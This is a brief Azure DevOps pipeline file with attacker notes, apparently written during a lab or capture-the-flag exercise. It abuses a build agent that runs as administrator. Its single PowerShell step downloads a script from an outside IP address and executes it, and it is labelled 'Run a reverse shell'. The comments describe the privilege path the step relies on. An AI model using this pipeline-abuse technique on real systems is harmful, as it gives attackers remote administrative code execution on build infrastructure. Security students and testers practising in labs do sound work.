#we're on stage 
#agent is Setup, by administrator
#robisl is part of build admin
#agent Setup --> run Jobs --> executed
#how to jump into steps
#i need to trigger : push repo, another build completion 
trigger:
- master

pool: 'Setup'

steps:
- powershell: 
    Invoke-WebRequest -Uri 10.10.14.53/iamf.ps1 -OutFile iamf.ps1
    .\iamf.ps1
  displayName: 'Run a reverse shell'
